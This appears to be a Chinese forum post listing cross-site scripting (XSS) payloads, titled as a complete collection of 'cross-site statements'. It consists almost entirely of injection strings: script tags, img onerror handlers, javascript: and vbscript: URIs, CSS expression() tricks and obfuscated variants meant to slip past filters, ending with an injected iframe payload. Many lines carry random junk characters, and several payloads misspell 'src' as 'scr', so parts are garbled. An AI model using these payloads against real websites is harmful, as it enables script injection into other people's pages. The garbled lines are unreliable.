跨站语句大全

admin

<script>alert("跨站")</script>    (最常用）
! s6 O; n  G: g/ R<img scr=javascript:alert("跨站")></img>
<img scr="javascrip&#116&#58 alert(/跨站/)></img>
: m3 M( M1 I4 b4 c7 f; H: c" t<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格）
<img scr="#" onerror=alert(/跨站/)></img>
& ^- b) \$ j/ B$ W# w; `) |<img scr="#" style="xss:expression(alert(/xss/));"></img>
) i' j! \, O& x. R<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释）
2 M; a. f7 |# i. j<img src=vbscript:msgbox ("xss")></img>
; \+ w2 D7 J# d! l% V, H/ D9 r<style> input {left:expression (alert('xss'))}</style>
9 U& u  _7 m; [$ e. @<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
1 X# E. e! k- M" p+ l7 }+ ^- h' Rhtml 实体 <div style={left:&#ｘ0065；xpression (alert('xss'))}></div>
) D( p% y6 ]# Cunicode <div style="{left:expRessioN (alert('xss'))}">
2 h1 g6 M  x4 v6 {# O3 c; Q
/ j3 A, V" n5 r"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
! t: A( n: @5 @9 T! d, j  U